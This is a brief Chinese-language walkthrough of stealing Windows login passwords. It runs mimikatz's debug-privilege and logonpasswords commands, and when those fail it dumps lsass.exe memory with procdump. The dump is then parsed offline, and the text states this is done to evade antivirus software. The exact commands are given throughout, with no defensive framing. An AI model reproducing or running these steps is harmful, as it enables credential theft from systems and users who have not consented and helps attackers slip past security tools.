首先打開mimikatz_trunk2.0
在DOS運作界面中輸入privilege::debug提權指令1
我們提權成功後,我們再來輸入sekurlsa::logonpasswords抓取密碼指令
但是出現錯誤,如下圖
網上搜尋了一下,我決定使用procdump結合mimikatz實作免殺效果,procdump是微軟的官方工具,不會被殺.
首先在任務管理器找到lsass.exe,右鍵建立轉儲檔案
用procdump導出lsass.dmp後拖回本地抓取密碼來規避殺軟。
指令:
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
注意點:
使用管理者權限打開DOS視窗
*需将lsass.dmp移到procdump64.exe同目錄